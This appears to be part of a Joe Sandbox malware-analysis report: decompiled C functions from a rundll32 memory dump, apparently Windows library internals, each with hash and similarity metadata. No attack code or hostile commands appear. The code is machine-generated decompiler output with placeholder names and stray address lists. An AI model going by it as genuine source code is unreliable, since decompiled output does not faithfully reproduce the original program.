                                                                                            									if(_t122 != 0xc0000023) {
                                                                                            										goto L26;
                                                                                            									}
                                                                                            									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                                                            								}
                                                                                            								_t122 = 0xc0000017;
                                                                                            								goto L26;
                                                                                            							}
                                                                                            							_t119 = 0;
                                                                                            							do {
                                                                                            								_t114 = _t124[3];
                                                                                            								_t119 = _t119 + 0xc;
                                                                                            								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                                                            								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                                                            								_t123 = _t123 + 1;
                                                                                            								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                                                            							} while (_t123 < _t108);
                                                                                            							goto L21;
                                                                                            						}
                                                                                            						_push(0x28);
                                                                                            						_push(3);
                                                                                            						_t122 = E045DA7B0();
                                                                                            						if(_t122 < 0) {
                                                                                            							goto L33;
                                                                                            						}
                                                                                            						_t124[4] = _t124[4] | 0x00000001;
                                                                                            						goto L18;
                                                                                            					}
                                                                                            					if((_t106 & 0x00000001) == 0) {
                                                                                            						_t115 = 0x28;
                                                                                            						_t122 = E0466E7D3(_t115, _t124);
                                                                                            						if(_t122 < 0) {
                                                                                            							L9:
                                                                                            							_push(_t124);
                                                                                            							_push(0);
                                                                                            							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                                            							goto L37;
                                                                                            						}
                                                                                            						L12:
                                                                                            						if( *_t124 != 0) {
                                                                                            							goto L18;
                                                                                            						}
                                                                                            						goto L13;
                                                                                            					}
                                                                                            					_t15 =  &(_t124[1]); // 0x4
                                                                                            					_t117 = 4;
                                                                                            					_t122 = E0466E7D3(_t117, _t15);
                                                                                            					if(_t122 >= 0) {
                                                                                            						_t124[4] = _t124[4] | 0x00000001;
                                                                                            						_v12 = _v12 & 0x00000000;
                                                                                            						_push(4);
                                                                                            						_push( &_v12);
                                                                                            						_push(5);
                                                                                            						_push(0xfffffffe);
                                                                                            						E046195B0();
                                                                                            						goto L12;
                                                                                            					}
                                                                                            					goto L9;
                                                                                            				} else {
                                                                                            					return 0xc0000017;
                                                                                            				}
                                                                                            			}





















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 462a0e496e8b9cfdd98c6c4af7e718ff3d7ea3a581c52c45abf715eae0a38641
                                                                                            • Instruction ID: 318163f68c22d4b9eb9c477c95ff3d7b8f39af0efa803ba5e9c4f2debea9b3b2
                                                                                            • Opcode Fuzzy Hash: 462a0e496e8b9cfdd98c6c4af7e718ff3d7ea3a581c52c45abf715eae0a38641
                                                                                            • Instruction Fuzzy Hash: BA710F32200B11EFE7319F14C844F66BBB9EB84B24F184928E656CB2A0FB75F945DB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 79%
                                                                                            			E04656DC9(signed int __ecx, void* __edx) {
                                                                                            				unsigned int _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				signed int _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				char _v32;
                                                                                            				char _v36;
                                                                                            				char _v40;
                                                                                            				char _v44;
                                                                                            				char _v48;
                                                                                            				char _v52;
                                                                                            				char _v56;
                                                                                            				char _v60;
                                                                                            				void* _t87;
                                                                                            				void* _t95;
                                                                                            				signed char* _t96;
                                                                                            				signed int _t107;
                                                                                            				signed int _t136;
                                                                                            				signed char* _t137;
                                                                                            				void* _t157;
                                                                                            				void* _t161;
                                                                                            				void* _t167;
                                                                                            				intOrPtr _t168;
                                                                                            				void* _t174;
                                                                                            				void* _t175;
                                                                                            				signed int _t176;
                                                                                            				void* _t177;
                                                                                            
                                                                                            				_t136 = __ecx;
                                                                                            				_v44 = 0;
                                                                                            				_t167 = __edx;
                                                                                            				_v40 = 0;
                                                                                            				_v36 = 0;
                                                                                            				_v32 = 0;
                                                                                            				_v60 = 0;
                                                                                            				_v56 = 0;
                                                                                            				_v52 = 0;
                                                                                            				_v48 = 0;
                                                                                            				_v16 = __ecx;
                                                                                            				_t87 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                                                                            				_t175 = _t87;
                                                                                            				if(_t175 != 0) {
                                                                                            					_t11 = _t175 + 0x30; // 0x30
                                                                                            					 *((short*)(_t175 + 6)) = 0x14d4;
                                                                                            					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                                                                            					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                                                                            					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                                                                            					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                                                                            					E04656B4C(_t167, _t11, 0x214,  &_v8);
                                                                                            					_v12 = _v8 + 0x10;
                                                                                            					_t95 = E045F7D50();
                                                                                            					_t137 = 0x7ffe0384;
                                                                                            					if(_t95 == 0) {
                                                                                            						_t96 = 0x7ffe0384;
                                                                                            					} else {
                                                                                            						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            					}
                                                                                            					_push(_t175);
                                                                                            					_push(_v12);
                                                                                            					_push(0x402);
                                                                                            					_push( *_t96 & 0x000000ff);
                                                                                            					E04619AE0();
                                                                                            					_t87 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                                                                            					_t176 = _v16;
                                                                                            					if((_t176 & 0x00000100) != 0) {
                                                                                            						_push( &_v36);
                                                                                            						_t157 = 4;
                                                                                            						_t87 = E0465795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                                                                            						if(_t87 >= 0) {
                                                                                            							_v24 = E0465795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                                                                            							_v28 = E0465795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                                                                            							_push( &_v52);
                                                                                            							_t161 = 5;
                                                                                            							_t168 = E0465795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                                                                            							_v20 = _t168;
                                                                                            							_t107 = L045F4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                                                                            							_v16 = _t107;
                                                                                            							if(_t107 != 0) {
                                                                                            								_v8 = _v8 & 0x00000000;
                                                                                            								 *(_t107 + 0x20) = _t176;
                                                                                            								 *((short*)(_t107 + 6)) = 0x14d5;
                                                                                            								_t47 = _t107 + 0x24; // 0x24
                                                                                            								_t177 = _t47;
                                                                                            								E04656B4C( &_v36, _t177, 0xc78,  &_v8);
                                                                                            								_t51 = _v8 + 4; // 0x4
                                                                                            								_t178 = _t177 + (_v8 >> 1) * 2;
                                                                                            								_v12 = _t51;
                                                                                            								E04656B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                                            								_v12 = _v12 + _v8;
                                                                                            								E04656B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                                            								_t125 = _v8;
                                                                                            								_v12 = _v12 + _v8;
                                                                                            								E04656B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                                                                            								_t174 = _v12 + _v8;
                                                                                            								if(E045F7D50() != 0) {
                                                                                            									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            								}
                                                                                            								_push(_v16);
                                                                                            								_push(_t174);
                                                                                            								_push(0x402);
                                                                                            								_push( *_t137 & 0x000000ff);
                                                                                            								E04619AE0();
                                                                                            								L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                                                                            								_t168 = _v20;
                                                                                            							}
                                                                                            							_t87 = L045F2400( &_v36);
                                                                                            							if(_v24 >= 0) {
                                                                                            								_t87 = L045F2400( &_v44);
                                                                                            							}
                                                                                            							if(_t168 >= 0) {
                                                                                            								_t87 = L045F2400( &_v52);
                                                                                            							}
                                                                                            							if(_v28 >= 0) {
                                                                                            								return L045F2400( &_v60);
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            				return _t87;
                                                                                            			}
































                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                            • Instruction ID: ac66b928db8901434027c87cfcb334998cb6771b46ef747a0fd23834232a227f
                                                                                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                            • Instruction Fuzzy Hash: E9717071E00619EFDB10DFA5C944AEEBBB9FF88714F104069E905E7250E730BA41CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 80%
                                                                                            			E045D52A5(char __ecx) {
                                                                                            				char _v20;
                                                                                            				char _v28;
                                                                                            				char _v29;
                                                                                            				void* _v32;
                                                                                            				void* _v36;
                                                                                            				void* _v37;
                                                                                            				void* _v38;
                                                                                            				void* _v40;
                                                                                            				void* _v46;
                                                                                            				void* _v64;
                                                                                            				void* __ebx;
                                                                                            				intOrPtr* _t49;
                                                                                            				signed int _t53;
                                                                                            				short _t85;
                                                                                            				signed int _t87;
                                                                                            				signed int _t88;
                                                                                            				signed int _t89;
                                                                                            				intOrPtr _t101;
                                                                                            				intOrPtr* _t102;
                                                                                            				intOrPtr* _t104;
                                                                                            				signed int _t106;
                                                                                            				void* _t108;
                                                                                            
                                                                                            				_t93 = __ecx;
                                                                                            				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                                                            				_push(_t88);
                                                                                            				_v29 = __ecx;
                                                                                            				_t89 = _t88 | 0xffffffff;
                                                                                            				while(1) {
                                                                                            					E045EEEF0(0x46c79a0);
                                                                                            					_t104 =  *0x46c8210; // 0x29e2bd8
                                                                                            					if(_t104 == 0) {
                                                                                            						break;
                                                                                            					}
                                                                                            					asm("lock inc dword [esi]");
                                                                                            					_t2 = _t104 + 8; // 0x28000000
                                                                                            					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
                                                                                            					E045EEB70(_t93, 0x46c79a0);
                                                                                            					if( *((char*)(_t108 + 0xf)) != 0) {
                                                                                            						_t101 =  *0x7ffe02dc;
                                                                                            						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                            						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                                                            							L9:
                                                                                            							_push(0);
                                                                                            							_push(0);
                                                                                            							_push(0);
                                                                                            							_push(0);
                                                                                            							_push(0x90028);
                                                                                            							_push(_t108 + 0x20);
                                                                                            							_push(0);
                                                                                            							_push(0);
                                                                                            							_push(0);
                                                                                            							_t10 = _t104 + 4; // 0x0
                                                                                            							_push( *_t10);
                                                                                            							_t53 = E04619890();
                                                                                            							__eflags = _t53;
                                                                                            							if(_t53 >= 0) {
                                                                                            								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                            								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                                                            									E045EEEF0(0x46c79a0);
                                                                                            									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                                                            									E045EEB70(0, 0x46c79a0);
                                                                                            								}
                                                                                            								goto L3;
                                                                                            							}
                                                                                            							__eflags = _t53 - 0xc0000012;
                                                                                            							if(__eflags == 0) {
                                                                                            								L12:
                                                                                            								_t11 = _t104 + 0xe; // 0x9e2bf002
                                                                                            								_t13 = _t104 + 0xc; // 0x29e2be5
                                                                                            								_t93 = _t13;
                                                                                            								 *((char*)(_t108 + 0x12)) = 0;
                                                                                            								__eflags = E0460F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
                                                                                            								if(__eflags >= 0) {
                                                                                            									L15:
                                                                                            									_t102 = _v28;
                                                                                            									 *_t102 = 2;
                                                                                            									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                            									E045EEEF0(0x46c79a0);
                                                                                            									__eflags =  *0x46c8210 - _t104; // 0x29e2bd8
                                                                                            									if(__eflags == 0) {
                                                                                            										__eflags =  *((char*)(_t108 + 0xe));
                                                                                            										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                                                            										 *0x46c8210 = _t102;
                                                                                            										_t32 = _t102 + 0xc; // 0x0
                                                                                            										 *_t95 =  *_t32;
                                                                                            										_t33 = _t102 + 0x10; // 0x0
                                                                                            										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                                                            										_t35 = _t102 + 4; // 0xffffffff
                                                                                            										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                                                            										if(__eflags != 0) {
                                                                                            											_t37 = _t104 + 0x10; // 0x20029e2b
                                                                                            											_t95 =  *((intOrPtr*)( *_t37));
                                                                                            											E04654888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
                                                                                            										}
                                                                                            										E045EEB70(_t95, 0x46c79a0);
                                                                                            										asm("lock xadd [esi], eax");
                                                                                            										if(__eflags == 0) {
                                                                                            											_t38 = _t104 + 4; // 0x0
                                                                                            											_push( *_t38);
                                                                                            											E046195D0();
                                                                                            											L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                            										}
                                                                                            										asm("lock xadd [esi], ebx");
                                                                                            										__eflags = _t89 == 1;
                                                                                            										if(_t89 == 1) {
                                                                                            											_t41 = _t104 + 4; // 0x0
                                                                                            											_push( *_t41);
                                                                                            											E046195D0();
                                                                                            											L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                            											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                            										}
                                                                                            										_t49 = _t102;
                                                                                            										L4:
                                                                                            										return _t49;
                                                                                            									}
                                                                                            									E045EEB70(_t93, 0x46c79a0);
                                                                                            									asm("lock xadd [esi], eax");
                                                                                            									if(__eflags == 0) {
                                                                                            										_t25 = _t104 + 4; // 0x0
                                                                                            										_push( *_t25);
                                                                                            										E046195D0();
                                                                                            										L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                                            										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                                            									}
                                                                                            									 *_t102 = 1;
                                                                                            									asm("lock xadd [edi], eax");
                                                                                            									if(__eflags == 0) {
                                                                                            										_t28 = _t102 + 4; // 0xffffffff
                                                                                            										_push( *_t28);
                                                                                            										E046195D0();
                                                                                            										L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                                                            									}
                                                                                            									continue;
                                                                                            								}
                                                                                            								_t15 = _t104 + 0x10; // 0x20029e2b
                                                                                            								_t93 =  &_v20;
                                                                                            								_t17 = _t104 + 0xe; // 0x9e2bf002
                                                                                            								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
                                                                                            								_t85 = 6;
                                                                                            								_v20 = _t85;
                                                                                            								_t87 = E0460F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
                                                                                            								__eflags = _t87;
                                                                                            								if(_t87 < 0) {
                                                                                            									goto L3;
                                                                                            								}
                                                                                            								 *((char*)(_t108 + 0xe)) = 1;
                                                                                            								goto L15;
                                                                                            							}
                                                                                            							__eflags = _t53 - 0xc000026e;
                                                                                            							if(__eflags != 0) {
                                                                                            								goto L3;
                                                                                            							}
                                                                                            							goto L12;
                                                                                            						}
                                                                                            						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                                                            						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                                                            							goto L3;
                                                                                            						} else {
                                                                                            							goto L9;
                                                                                            						}
                                                                                            					}
                                                                                            					L3:
                                                                                            					_t49 = _t104;
                                                                                            					goto L4;
                                                                                            				}
                                                                                            				_t49 = 0;
                                                                                            				goto L4;
                                                                                            			}


























                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3ca13773ccd36d747a9f5e372b0b8c4d19f66c9bb70eae3e86f13fd1c70737c4
                                                                                            • Instruction ID: d878319dad848b39764cb26a468ddf64c811d9ed10db7f5f153f952a3dfd5770
                                                                                            • Opcode Fuzzy Hash: 3ca13773ccd36d747a9f5e372b0b8c4d19f66c9bb70eae3e86f13fd1c70737c4
                                                                                            • Instruction Fuzzy Hash: A551EA71205782ABE320EF28C841B2BBBE4FF94715F14492EE49587650F774F808EB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E04602AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                                                            				signed short* _v8;
                                                                                            				signed short* _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				intOrPtr* _v28;
                                                                                            				signed int _v32;
                                                                                            				signed int _v36;
                                                                                            				short _t56;
                                                                                            				signed int _t57;
                                                                                            				intOrPtr _t58;
                                                                                            				signed short* _t61;
                                                                                            				intOrPtr _t72;
                                                                                            				intOrPtr _t75;
                                                                                            				intOrPtr _t84;
                                                                                            				intOrPtr _t87;
                                                                                            				intOrPtr* _t90;
                                                                                            				signed short* _t91;
                                                                                            				signed int _t95;
                                                                                            				signed short* _t96;
                                                                                            				intOrPtr _t97;
                                                                                            				intOrPtr _t102;
                                                                                            				signed int _t108;
                                                                                            				intOrPtr _t110;
                                                                                            				signed int _t111;
                                                                                            				signed short* _t112;
                                                                                            				void* _t113;
                                                                                            				signed int _t116;
                                                                                            				signed short** _t119;
                                                                                            				short* _t120;
                                                                                            				signed int _t123;
                                                                                            				signed int _t124;
                                                                                            				void* _t125;
                                                                                            				intOrPtr _t127;
                                                                                            				signed int _t128;
                                                                                            
                                                                                            				_t90 = __ecx;
                                                                                            				_v16 = __edx;
                                                                                            				_t108 = _a4;
                                                                                            				_v28 = __ecx;
                                                                                            				_t4 = _t108 - 1; // -1
                                                                                            				if(_t4 > 0x13) {
                                                                                            					L15:
                                                                                            					_t56 = 0xc0000100;
                                                                                            					L16:
                                                                                            					return _t56;
                                                                                            				}
                                                                                            				_t57 = _t108 * 0x1c;
                                                                                            				_v32 = _t57;
                                                                                            				_t6 = _t57 + 0x46c8204; // 0x0
                                                                                            				_t123 =  *_t6;
                                                                                            				_t7 = _t57 + 0x46c8208; // 0x46c8207
                                                                                            				_t8 = _t57 + 0x46c8208; // 0x46c8207
                                                                                            				_t119 = _t8;
                                                                                            				_v36 = _t123;
                                                                                            				_t110 = _t7 + _t123 * 8;
                                                                                            				_v24 = _t110;
                                                                                            				_t111 = _a4;
                                                                                            				if(_t119 >= _t110) {
                                                                                            					L12:
                                                                                            					if(_t123 != 3) {
                                                                                            						_t58 =  *0x46c8450; // 0x29e174c
                                                                                            						if(_t58 == 0) {
                                                                                            							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                                                            						}
                                                                                            					} else {
                                                                                            						_t26 = _t57 + 0x46c821c; // 0x0
                                                                                            						_t58 =  *_t26;
                                                                                            					}
                                                                                            					 *_t90 = _t58;
                                                                                            					goto L15;
                                                                                            				} else {
                                                                                            					goto L2;
                                                                                            				}
                                                                                            				while(1) {
                                                                                            					_t116 =  *_t61 & 0x0000ffff;
                                                                                            					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                                            					if(_t116 == _t128) {
                                                                                            						goto L18;
                                                                                            					}
                                                                                            					L5:
                                                                                            					if(_t116 >= 0x61) {
                                                                                            						if(_t116 > 0x7a) {
                                                                                            							_t97 =  *0x46c6d5c; // 0x7fce0654
                                                                                            							_t72 =  *0x46c6d5c; // 0x7fce0654
                                                                                            							_t75 =  *0x46c6d5c; // 0x7fce0654
                                                                                            							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                                                            						} else {
                                                                                            							_t116 = _t116 - 0x20;
                                                                                            						}
                                                                                            					}
                                                                                            					if(_t128 >= 0x61) {
                                                                                            						if(_t128 > 0x7a) {
                                                                                            							_t102 =  *0x46c6d5c; // 0x7fce0654
                                                                                            							_t84 =  *0x46c6d5c; // 0x7fce0654
                                                                                            							_t87 =  *0x46c6d5c; // 0x7fce0654
                                                                                            							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                                                            						} else {
                                                                                            							_t128 = _t128 - 0x20;
                                                                                            						}
                                                                                            					}
                                                                                            					if(_t116 == _t128) {
                                                                                            						_t61 = _v12;
                                                                                            						_t96 = _v8;
                                                                                            					} else {
                                                                                            						_t113 = _t116 - _t128;
                                                                                            						L9:
                                                                                            						_t111 = _a4;
                                                                                            						if(_t113 == 0) {
                                                                                            							_t115 =  &(( *_t119)[_t111 + 1]);
                                                                                            							_t33 =  &(_t119[1]); // 0x100
                                                                                            							_t120 = _a8;
                                                                                            							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                                                            							_t35 = _t95 - 1; // 0xff
                                                                                            							_t124 = _t35;
                                                                                            							if(_t120 == 0) {
                                                                                            								L27:
                                                                                            								 *_a16 = _t95;
                                                                                            								_t56 = 0xc0000023;
                                                                                            								goto L16;
                                                                                            							}
                                                                                            							if(_t124 >= _a12) {
                                                                                            								if(_a12 >= 1) {
                                                                                            									 *_t120 = 0;
                                                                                            								}
                                                                                            								goto L27;
                                                                                            							}
                                                                                            							 *_a16 = _t124;
                                                                                            							_t125 = _t124 + _t124;
                                                                                            							E0461F3E0(_t120, _t115, _t125);
                                                                                            							_t56 = 0;
                                                                                            							 *((short*)(_t125 + _t120)) = 0;
                                                                                            							goto L16;
                                                                                            						}
                                                                                            						_t119 =  &(_t119[2]);
                                                                                            						if(_t119 < _v24) {
                                                                                            							L2:
                                                                                            							_t91 =  *_t119;
                                                                                            							_t61 = _t91;
                                                                                            							_v12 = _t61;
                                                                                            							_t112 =  &(_t61[_t111]);
                                                                                            							_v8 = _t112;
                                                                                            							if(_t61 >= _t112) {
                                                                                            								break;
                                                                                            							} else {
                                                                                            								_t127 = _v16 - _t91;
                                                                                            								_t96 = _t112;
                                                                                            								_v20 = _t127;
                                                                                            								_t116 =  *_t61 & 0x0000ffff;
                                                                                            								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                                            								if(_t116 == _t128) {
                                                                                            									goto L18;
                                                                                            								}
                                                                                            								goto L5;
                                                                                            							}
                                                                                            						} else {
                                                                                            							_t90 = _v28;
                                                                                            							_t57 = _v32;
                                                                                            							_t123 = _v36;
                                                                                            							goto L12;
                                                                                            						}
                                                                                            					}
                                                                                            					L18:
                                                                                            					_t61 =  &(_t61[1]);
                                                                                            					_v12 = _t61;
                                                                                            					if(_t61 >= _t96) {
                                                                                            						break;
                                                                                            					}
                                                                                            					_t127 = _v20;
                                                                                            				}
                                                                                            				_t113 = 0;
                                                                                            				goto L9;
                                                                                            			}
                                                                                            0x04602b43
                                                                                            0x04602b45
                                                                                            0x04602b47
                                                                                            0x04602b4a
                                                                                            0x04602b4d
                                                                                            0x04602b53
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602b53
                                                                                            0x04602b78
                                                                                            0x04602b78
                                                                                            0x04602b7b
                                                                                            0x04602b7e
                                                                                            0x00000000
                                                                                            0x04602b7e
                                                                                            0x04602b76
                                                                                            0x04602ba5
                                                                                            0x04602ba5
                                                                                            0x04602ba8
                                                                                            0x04602bad
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602baf
                                                                                            0x04602baf
                                                                                            0x04602bc2
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f1f4ad37e06e0cc90703294d896b49b1b82a99a10e66cc6b4750a26b1f96145e
                                                                                            • Instruction ID: d38b0207096db8749ede8144dd06e2ede9d33d727b113eb355924925f68e1848
                                                                                            • Opcode Fuzzy Hash: f1f4ad37e06e0cc90703294d896b49b1b82a99a10e66cc6b4750a26b1f96145e
                                                                                            • Instruction Fuzzy Hash: 6D5190B6B001258BCB18DF18C8A89BEB7B1FF98704715C49AE8469B390F734BE51D790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 86%
                                                                                            			E045FDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                            				char _v5;
                                                                                            				signed int _v12;
                                                                                            				signed int* _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				intOrPtr _v32;
                                                                                            				intOrPtr _v36;
                                                                                            				intOrPtr _v40;
                                                                                            				intOrPtr _v44;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				signed int _t54;
                                                                                            				char* _t58;
                                                                                            				signed int _t66;
                                                                                            				intOrPtr _t67;
                                                                                            				intOrPtr _t68;
                                                                                            				intOrPtr _t72;
                                                                                            				intOrPtr _t73;
                                                                                            				signed int* _t75;
                                                                                            				intOrPtr _t79;
                                                                                            				intOrPtr _t80;
                                                                                            				char _t82;
                                                                                            				signed int _t83;
                                                                                            				signed int _t84;
                                                                                            				signed int _t88;
                                                                                            				signed int _t89;
                                                                                            				intOrPtr _t90;
                                                                                            				intOrPtr _t92;
                                                                                            				signed int _t97;
                                                                                            				intOrPtr _t98;
                                                                                            				intOrPtr* _t99;
                                                                                            				signed int* _t101;
                                                                                            				signed int* _t102;
                                                                                            				intOrPtr* _t103;
                                                                                            				intOrPtr _t105;
                                                                                            				signed int _t106;
                                                                                            				void* _t118;
                                                                                            
                                                                                            				_t92 = __edx;
                                                                                            				_t75 = _a4;
                                                                                            				_t98 = __ecx;
                                                                                            				_v44 = __edx;
                                                                                            				_t106 = _t75[1];
                                                                                            				_v40 = __ecx;
                                                                                            				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                                                            					_t82 = 0;
                                                                                            				} else {
                                                                                            					_t82 = 1;
                                                                                            				}
                                                                                            				_v5 = _t82;
                                                                                            				_t6 = _t98 + 0xc8; // 0xc9
                                                                                            				_t101 = _t6;
                                                                                            				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                                                            				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                                                            				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                                                            				if(_t82 != 0) {
                                                                                            					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                                                            					_t83 =  *_t75;
                                                                                            					_t54 = _t75[1];
                                                                                            					 *_t101 = _t83;
                                                                                            					_t84 = _t83 | _t54;
                                                                                            					_t101[1] = _t54;
